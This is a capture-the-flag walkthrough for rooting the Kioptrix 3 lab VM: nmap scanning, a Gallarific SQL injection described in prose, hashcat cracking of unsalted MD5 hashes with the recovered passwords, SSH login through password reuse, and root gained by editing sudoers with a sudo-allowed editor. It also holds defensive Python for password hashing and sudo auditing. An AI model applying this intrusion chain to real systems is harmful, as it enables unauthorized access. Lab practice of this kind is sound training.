Rooting Kioptrix 3 Walkthrough

Overview

Kioptrix 3 is a boot-to-root (B2R) VM designed for students to practice vulnerability analysis and exploitation. The objective is to root the virtual machine by exploiting its vulnerabilities, leading to full system compromise.

Vulnerabilities Exploited:

  • SQL Injection
  • Password reuse
  • Sudo Misconfiguration

Lab Setup:

  • VMware Workstation for the virtual machines
  • Kali Linux VM in bridged mode
  • Kioptrix 3 in bridged mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap

Reconnaissance/Scanning

I used netdiscover to find the IP address of the target VM.

#netdiscover

Target VM IP Address: 192.168.8.105

I modified my /etc/hosts file as instructed by the author of the VM (see the VulnHub entry): https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

root@kali:~# cat /etc/hosts

192.168.8.105  kioptrix3.com

Next, I used nmap to find open ports and services on the target machine.

root@kali:~# nmap -p- -A 192.168.8.105

Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-30 00:02 EDT
Nmap scan report for 192.168.8.105
Host is up (0.00026s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:62:9A:C5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.26 ms 192.168.8.105

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.15 seconds

A website is hosted on port 80. Let's explore it in the browser.

In the page comments I found the gallery admin panel.

The title of the login page shows that the gallery is Gallarific Photo Gallery.

Exploitation

A quick Google search shows a known SQL injection in Gallarific Photo Gallery.

Using the SQL injection, I dumped the admin username and password, which were stored in plain text,

and logged into the Gallarific admin panel.

This is a dead end: the admin panel doesn't offer much that we can use.

Let's use the SQL injection to read the local file system. Reading /etc/passwd, /etc/group and /etc/my.cnf succeeds, but no other local configuration file is readable.

Let's enumerate the other databases and tables through the SQL injection.

I found two default databases, with "gallery" as the only user-created database. Let's list the tables in the gallery database.

dev_accounts looks like an interesting table name. Let's list its columns

and dump the username:password pairs.

I cracked these MD5 hashes with hashcat (mode 0, dictionary attack with rockyou.txt).


root@kali:~# hashcat -m 0 -a 0 --force  -o found1.txt  hashes.txt /root/rockyou.txt

hashcat (v4.0.1) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-3520M CPU @ 2.90GHz, 512/1493 MB allocatable, 4MCU

Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
 
Password length minimum: 0
Password length maximum: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastical reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Watchdog: Temperature retain trigger disabled.

* Device #1: build_opts '-I /usr/share/hashcat/OpenCL -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=0 -D _unroll'
Dictionary cache hit:
* Filename..: /root/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
- Device #1: autotuned kernel-accel to 1024
- Device #1: autotuned kernel-loops to 1
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =>
Session..........: hashcat
Status...........: Cracked
Hash.Type........: MD5
Hash.Target......: hashes.txt
Time.Started.....: Wed May 30 05:06:33 2018 (5 secs)
Time.Estimated...: Wed May 30 05:06:38 2018 (0 secs)
Guess.Base.......: File (/root/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:  3110.3 kH/s (0.68ms)
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10838016/14344385 (75.56%)
Rejected.........: 0/10838016 (0.00%)
Restore.Point....: 10833920/14344385 (75.53%)
Candidates.#1....: MasterFlick -> March3490
HWMon.Dev.#1.....: N/A

Started: Wed May 30 05:06:32 2018
Stopped: Wed May 30 05:06:39 2018
root@kali:~# cat found1.txt
5badcaf789d3d1d09794d8f021f40f0e:starwars
0d3eccfb887aabd50f243b3f155c0f85:Mast3r
root@kali:~#

dreg:Mast3r          // dreg doesn't have sudo privileges

loneferret:starwars  // loneferret has sudo privileges

The passwords from the web application's dev_accounts table are reused for the system accounts, so the cracked credentials also work over SSH.
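Why the crack finished in five seconds: dev_accounts stored bare, unsalted MD5. The script below is an added example, not part of the original write-up; it re-checks the two found1.txt lines quoted above against hashlib.md5 and contrasts them with salted scrypt storage, which is how the credentials should have been stored. The found1.txt text is a constructed copy of the lines above, and the scrypt parameters are assumed values.

```python
import hashlib
import secrets

# Constructed copy of the two found1.txt lines quoted above ('<md5hex>:<password>').
FOUND1_TXT = """5badcaf789d3d1d09794d8f021f40f0e:starwars
0d3eccfb887aabd50f243b3f155c0f85:Mast3r
"""

def parse_found(text):
    """Parse hashcat -o output into {digest: plaintext}."""
    pairs = {}
    for line in text.splitlines():
        if ":" in line:
            digest, _, plain = line.partition(":")
            pairs[digest.strip().lower()] = plain.strip()
    return pairs

def is_unsalted_md5(digest, plain):
    """True when the stored value is a bare MD5 of the password: no salt and no work
    factor, so a wordlist runs at millions of guesses per second (3110 kH/s above)."""
    return hashlib.md5(plain.encode()).hexdigest() == digest.lower()

def hash_password(plain, salt=None):
    """Defensive alternative: per-user random salt plus scrypt (memory-hard, tunable).
    Stored form is '<salthex>$<digesthex>'. Assumed cost n=2**14, r=8, p=1 (~16 MiB)."""
    salt = secrets.token_bytes(16) if salt is None else salt
    digest = hashlib.scrypt(plain.encode(), salt=salt, n=2**14, r=8, p=1)
    return salt.hex() + "$" + digest.hex()

def verify_password(plain, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, _, _ = stored.partition("$")
    candidate = hash_password(plain, bytes.fromhex(salt_hex))
    return secrets.compare_digest(candidate, stored)

if __name__ == "__main__":
    for digest, plain in parse_found(FOUND1_TXT).items():
        print(f"{digest}  unsalted MD5 of {plain!r}: {is_unsalted_md5(digest, plain)}")
    stored = hash_password("starwars")
    print("scrypt record:", stored)
    print("verify correct:", verify_password("starwars", stored),
          " verify wrong:", verify_password("Starwars", stored))
```

Two scrypt records for the same password differ because each carries its own salt, so a single wordlist pass no longer cracks every account at once.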


root@kali:~# ssh loneferret@192.168.8.105
loneferret@192.168.8.105's password:
Permission denied, please try again.
loneferret@192.168.8.105's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Wed May  9 15:35:14 2018 from 192.168.8.103
loneferret@Kioptrix3:~$

Privilege Escalation

loneferret@Kioptrix3:~$ cat CompanyPolicy.README  // company policy says, use sudo ht:)
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
 
DG
CEO
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
loneferret@Kioptrix3:~$ ls -al /usr/local/bin/ht
-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht
loneferret@Kioptrix3:~$ sudo ht

Since ht runs as root under sudo (and is setuid root as well), it can open any file. Let's use it to edit /etc/sudoers and grant loneferret full sudo access.

Let's confirm the new sudo access:

loneferret@Kioptrix3:~$ sudo su
[sudo] password for loneferret: 
root@Kioptrix3:/home/loneferret# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:/home/loneferret# whoami
root
root@Kioptrix3:/home/loneferret#

and we have root access!
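The escalation above comes from two sudoers mistakes: a NOPASSWD rule on an editor running as root, and a `!` negation that prevents nothing. The audit script below is an added example, not part of the original write-up; it runs over a constructed copy of the `sudo -l` and `ls -al` lines quoted above and flags the conditions a hardening review would catch. The editor list is an assumed starting point, not an exhaustive one.

```python
import re

# Constructed copies of the `sudo -l` and `ls -al` lines quoted in the write-up.
SUDO_L_OUTPUT = """User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
"""
LS_LINE = "-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht"

# Editors and pagers can open any file when run as root (ht is the hex editor above).
# Assumed list for illustration; extend it for your environment.
EDITORS = {"ht", "vi", "vim", "nano", "emacs", "less", "more"}

# Matches "(runas) TAG: TAG: command" lines printed by `sudo -l`.
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)+)?(?P<cmd>\S.*)$")

def audit_sudo_l(text):
    """Flag sudo rules that amount to unrestricted root. Returns (path, reason) pairs."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line.strip())
        if not m:
            continue
        tags = m.group("tags") or ""
        cmd = m.group("cmd")
        path = cmd.lstrip("!").split()[0]
        name = path.rsplit("/", 1)[-1]
        if cmd.startswith("!"):
            # A '!' entry only negates that one command; it does not restrict what an
            # allowed editor can write, so it gives no protection on its own.
            findings.append((path, "negated entry gives no protection against file edits as root"))
            continue
        runs_as_root = m.group("runas") in ("root", "ALL")
        if runs_as_root and name in EDITORS:
            findings.append((path, "editor as root can rewrite /etc/sudoers or /etc/shadow"))
        if "NOPASSWD:" in tags:
            findings.append((path, "NOPASSWD: a reused or cracked login password is enough"))
    return findings

def setuid_bits(ls_line):
    """Return (setuid, setgid) from an `ls -l` mode string such as -rwsr-sr-x."""
    mode = ls_line.split()[0]
    return mode[3] in "sS", mode[6] in "sS"

if __name__ == "__main__":
    for path, reason in audit_sudo_l(SUDO_L_OUTPUT):
        print(f"{path}: {reason}")
    print("ht setuid/setgid:", setuid_bits(LS_LINE))
```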

References

https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
